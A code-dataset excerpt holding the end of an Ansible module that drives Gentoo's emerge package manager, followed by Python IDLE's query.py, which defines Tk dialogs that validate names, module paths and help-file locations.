        mutually_exclusive=[['nodeps', 'onlydeps'], ['quiet', 'verbose']],
        supports_check_mode=True,
    )
    # Resolve tool paths once; helpers read them off the module object.
    module.emerge_path = module.get_bin_path('emerge', required=True)
    module.equery_path = module.get_bin_path('equery', required=True)
    p = module.params
    # Sync first if requested; a sync-only invocation exits here.
    if p['sync'] and p['sync'].strip() != 'no':
        sync_repositories(module, webrsync=(p['sync'] == 'web'))
        if not p['package']:
            module.exit_json(msg='Sync successfully finished.')
    packages = []
    if p['package']:
        packages.extend(p['package'])
    # depclean takes precedence: with packages it is a dependency-aware
    # unmerge, so it is only valid together with an absent-like state.
    if p['depclean']:
        if packages and p['state'] not in portage_absent_states:
            module.fail_json(
                msg='Depclean can only be used with package when the state is '
                    'one of: %s' % portage_absent_states,
            )
        cleanup_packages(module, packages)
    elif p['state'] in portage_present_states:
        emerge_packages(module, packages)
    elif p['state'] in portage_absent_states:
        unmerge_packages(module, packages)
# import module snippets
# NOTE(review): legacy bottom-of-file wildcard import; it provides
# AnsibleModule used above. Newer Ansible style imports it explicitly at
# the top of the file.
from ansible.module_utils.basic import *
if __name__ == '__main__':
    main()
| gpl-3.0 |
Microsoft/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/idlelib/query.py | 3 | 12355 | """
Dialogs that query users and verify the answer before accepting.
Use ttk widgets, limiting use to tcl/tk 8.5+, as in IDLE 3.6+.
Query is the generic base class for a popup dialog.
The user must either enter a valid answer or close the dialog.
Entries are validated when <Return> is entered or [Ok] is clicked.
Entries are ignored when [Cancel] or [X] are clicked.
The 'return value' is .result set to either a valid answer or None.
Subclass SectionName gets a name for a new config file section.
Configdialog uses it for new highlight theme and keybinding set names.
Subclass ModuleName gets a name for File => Open Module.
Subclass HelpSource gets menu item and path for additions to Help menu.
"""
# Query and Section name result from splitting GetCfgSectionNameDialog
# of configSectionNameDialog.py (temporarily config_sec.py) into
# generic and specific parts. 3.6 only, July 2016.
# ModuleName.entry_ok came from editor.EditorWindow.load_module.
# HelpSource was extracted from configHelpSourceEdit.py (temporarily
# config_help.py), with darwin code moved from ok to path_ok.
import importlib
import os
from sys import executable, platform # Platform is set for one test.
from tkinter import Toplevel, StringVar, W, E, S
from tkinter.ttk import Frame, Button, Entry, Label
from tkinter import filedialog
from tkinter.font import Font
class Query(Toplevel):
    """Base class for getting verified answer from a user.
    For this base class, accept any non-blank string.
    """
    def __init__(self, parent, title, message, *, text0='', used_names={},
                 _htest=False, _utest=False):
        """Create popup, do not return until tk widget destroyed.
        Additional subclass init must be done before calling this
        unless _utest=True is passed to suppress wait_window().
        title - string, title of popup dialog
        message - string, informational message to display
        text0 - initial value for entry
        used_names - names already in use
        _htest - bool, change box location when running htest
        _utest - bool, leave window hidden and not modal
        """
        Toplevel.__init__(self, parent)
        self.withdraw()  # Hide while configuring, especially geometry.
        self.parent = parent
        self.title(title)
        self.message = message
        self.text0 = text0
        self.used_names = used_names
        # Keep the dialog on top of its parent and make it modal so the
        # caller's wait_window() below behaves like a blocking prompt.
        self.transient(parent)
        self.grab_set()
        windowingsystem = self.tk.call('tk', 'windowingsystem')
        if windowingsystem == 'aqua':
            # macOS: use the (unsupported) moveableModal style so the
            # dialog looks native; ignore failure on Tk builds lacking it.
            try:
                self.tk.call('::tk::unsupported::MacWindowStyle', 'style',
                             self._w, 'moveableModal', '')
            except:
                pass
            # Cmd-. is the standard macOS cancel gesture.
            self.bind("<Command-.>", self.cancel)
        # Escape, window close, Return, and keypad Enter all map onto
        # the cancel/ok handlers defined below.
        self.bind('<Key-Escape>', self.cancel)
        self.protocol("WM_DELETE_WINDOW", self.cancel)
        self.bind('<Key-Return>', self.ok)
        self.bind("<KP_Enter>", self.ok)
        self.resizable(height=False, width=False)
        self.create_widgets()
        self.update_idletasks()  # Needed here for winfo_reqwidth below.
        self.geometry(  # Center dialog over parent (or below htest box).
                "+%d+%d" % (
                    parent.winfo_rootx() +
                    (parent.winfo_width()/2 - self.winfo_reqwidth()/2),
                    parent.winfo_rooty() +
                    ((parent.winfo_height()/2 - self.winfo_reqheight()/2)
                    if not _htest else 150)
                ) )
        if not _utest:
            self.deiconify()  # Unhide now that geometry set.
            # Block here until the dialog is destroyed by ok() or cancel().
            self.wait_window()
    def create_widgets(self):  # Call from override, if any.
        # Bind to self widgets needed for entry_ok or unittest.
        self.frame = frame = Frame(self, padding=10)
        frame.grid(column=0, row=0, sticky='news')
        frame.grid_columnconfigure(0, weight=1)
        entrylabel = Label(frame, anchor='w', justify='left',
                           text=self.message)
        self.entryvar = StringVar(self, self.text0)
        self.entry = Entry(frame, width=30, textvariable=self.entryvar)
        self.entry.focus_set()
        self.error_font = Font(name='TkCaptionFont',
                               exists=True, root=self.parent)
        self.entry_error = Label(frame, text=' ', foreground='red',
                                 font=self.error_font)
        self.button_ok = Button(
                frame, text='OK', default='active', command=self.ok)
        self.button_cancel = Button(
                frame, text='Cancel', command=self.cancel)
        entrylabel.grid(column=0, row=0, columnspan=3, padx=5, sticky=W)
        self.entry.grid(column=0, row=1, columnspan=3, padx=5, sticky=W+E,
                        pady=[10,0])
        self.entry_error.grid(column=0, row=2, columnspan=3, padx=5,
                              sticky=W+E)
        # Buttons go at row 99 so subclasses can grid extra widgets in
        # the rows between (HelpSource uses rows 10-12).
        self.button_ok.grid(column=1, row=99, padx=5)
        self.button_cancel.grid(column=2, row=99, padx=5)
    def showerror(self, message, widget=None):
        "Display message in the given (or default entry) error label."
        #self.bell(displayof=self)
        (widget or self.entry_error)['text'] = 'ERROR: ' + message
    def entry_ok(self):  # Example: usually replace.
        "Return non-blank entry or None."
        self.entry_error['text'] = ''
        entry = self.entry.get().strip()
        if not entry:
            self.showerror('blank line.')
            return None
        return entry
    def ok(self, event=None):  # Do not replace.
        '''If entry is valid, bind it to 'result' and destroy tk widget.
        Otherwise leave dialog open for user to correct entry or cancel.
        '''
        entry = self.entry_ok()
        if entry is not None:
            self.result = entry
            self.destroy()
        else:
            # [Ok] moves focus.  (<Return> does not.)  Move it back.
            self.entry.focus_set()
    def cancel(self, event=None):  # Do not replace.
        "Set dialog result to None and destroy tk widget."
        self.result = None
        self.destroy()
class SectionName(Query):
    "Get a name for a config file section name."
    # Used in ConfigDialog.GetNewKeysName, .GetNewThemeName (837)
    def __init__(self, parent, title, message, used_names,
                 *, _htest=False, _utest=False):
        super().__init__(parent, title, message, used_names=used_names,
                         _htest=_htest, _utest=_utest)
    def entry_ok(self):
        "Return sensible ConfigParser section name or None."
        self.entry_error['text'] = ''
        name = self.entry.get().strip()
        # Validate in order: non-empty, short enough, not a duplicate.
        # The first failing check determines the message shown.
        problem = None
        if not name:
            problem = 'no name specified.'
        elif len(name) > 30:
            problem = 'name is longer than 30 characters.'
        elif name in self.used_names:
            problem = 'name is already in use.'
        if problem is not None:
            self.showerror(problem)
            return None
        return name
class ModuleName(Query):
    "Get a module name for Open Module menu entry."
    # Used in open_module (editor.EditorWindow until move to iobinding).
    def __init__(self, parent, title, message, text0,
                 *, _htest=False, _utest=False):
        """Get a source-module name and resolve it to a file path.
        text0 - initial value for the entry (e.g. a previous name).
        """
        super().__init__(parent, title, message, text0=text0,
                         _htest=_htest, _utest=_utest)
    def entry_ok(self):
        "Return entered module name as file path or None."
        self.entry_error['text'] = ''
        name = self.entry.get().strip()
        if not name:
            self.showerror('no name specified.')
            return None
        # XXX Ought to insert current file's directory in front of path.
        try:
            spec = importlib.util.find_spec(name)
        except (ValueError, ImportError) as msg:
            # find_spec raises ValueError for bad names (e.g. leading dot)
            # and ImportError when a parent package cannot be imported.
            self.showerror(str(msg))
            return None
        if spec is None:
            self.showerror("module not found")
            return None
        if not isinstance(spec.loader, importlib.abc.SourceLoader):
            # Only source-based modules can be opened in an editor window.
            self.showerror("not a source-based module")
            return None
        try:
            file_path = spec.loader.get_filename(name)
        except AttributeError:
            # Bug fix: Query.showerror(message, widget=None) has no
            # 'parent' parameter; the previous call passed parent=self
            # and raised TypeError instead of displaying this error.
            self.showerror("loader does not support get_filename")
            return None
        return file_path
class HelpSource(Query):
    "Get menu name and help source for Help menu."
    # Used in ConfigDialog.HelpListItemAdd/Edit, (941/9)
    def __init__(self, parent, title, *, menuitem='', filepath='',
                 used_names={}, _htest=False, _utest=False):
        """Get menu entry and url/local file for Additional Help.
        User enters a name for the Help resource and a web url or file
        name.  The user can browse for the file.
        """
        self.filepath = filepath
        message = 'Name for item on Help menu:'
        super().__init__(
                parent, title, message, text0=menuitem,
                used_names=used_names, _htest=_htest, _utest=_utest)
    def create_widgets(self):
        # Extend the base dialog with a labeled path entry, a Browse
        # button, and a second error label for path problems.
        super().create_widgets()
        frame = self.frame
        pathlabel = Label(frame, anchor='w', justify='left',
                          text='Help File Path: Enter URL or browse for file')
        self.pathvar = StringVar(self, self.filepath)
        self.path = Entry(frame, textvariable=self.pathvar, width=40)
        browse = Button(frame, text='Browse', width=8,
                        command=self.browse_file)
        self.path_error = Label(frame, text=' ', foreground='red',
                                font=self.error_font)
        # Rows 10-12 fall between the base class's entry rows (0-2) and
        # its OK/Cancel buttons (row 99).
        pathlabel.grid(column=0, row=10, columnspan=3, padx=5, pady=[10,0],
                       sticky=W)
        self.path.grid(column=0, row=11, columnspan=2, padx=5, sticky=W+E,
                       pady=[10,0])
        browse.grid(column=2, row=11, padx=5, sticky=W+S)
        self.path_error.grid(column=0, row=12, columnspan=3, padx=5,
                             sticky=W+E)
    def askfilename(self, filetypes, initdir, initfile):  # htest #
        # Extracted from browse_file so can mock for unittests.
        # Cannot unittest as cannot simulate button clicks.
        # Test by running htest, such as by running this file.
        return filedialog.Open(parent=self, filetypes=filetypes)\
               .show(initialdir=initdir, initialfile=initfile)
    def browse_file(self):
        "Open a file dialog seeded from the current entry and store the pick."
        filetypes = [
            ("HTML Files", "*.htm *.html", "TEXT"),
            ("PDF Files", "*.pdf", "TEXT"),
            ("Windows Help Files", "*.chm"),
            ("Text Files", "*.txt", "TEXT"),
            ("All Files", "*")]
        path = self.pathvar.get()
        if path:
            # Start browsing from the directory of the current path.
            dir, base = os.path.split(path)
        else:
            base = None
            if platform[:3] == 'win':
                # Default to the Doc directory next to the interpreter,
                # falling back to the cwd if it does not exist.
                dir = os.path.join(os.path.dirname(executable), 'Doc')
                if not os.path.isdir(dir):
                    dir = os.getcwd()
            else:
                dir = os.getcwd()
        file = self.askfilename(filetypes, dir, base)
        if file:
            self.pathvar.set(file)
    item_ok = SectionName.entry_ok  # localize for test override
    def path_ok(self):
        "Simple validity check for menu file path"
        path = self.path.get().strip()
        if not path:  # no path specified
            self.showerror('no help file path specified.', self.path_error)
            return None
        elif not path.startswith(('www.', 'http')):
            # Not an obvious URL: treat as a local file and require that
            # it exist (after stripping any 'file:' scheme prefix).
            if path[:5] == 'file:':
                path = path[5:]
            if not os.path.exists(path):
                self.showerror('help file path does not exist.',
                               self.path_error)
                return None
            if platform == 'darwin':  # for Mac Safari
                path = "file://" + path
        return path
    def entry_ok(self):
        "Return apparently valid (name, path) or None"
        # Clear both error labels, then validate each field; succeed only
        # if both the menu-item name and the path pass their checks.
        self.entry_error['text'] = ''
        self.path_error['text'] = ''
        name = self.item_ok()
        path = self.path_ok()
        return None if name is None or path is None else (name, path)
if __name__ == '__main__':
    # Run the module's unit tests first (exit=False keeps the process
    # alive), then launch the manual GUI checks via IDLE's htest harness.
    import unittest
    unittest.main('idlelib.idle_test.test_query', verbosity=2, exit=False)
    from idlelib.idle_test.htest import run
    run(Query, HelpSource)
| apache-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.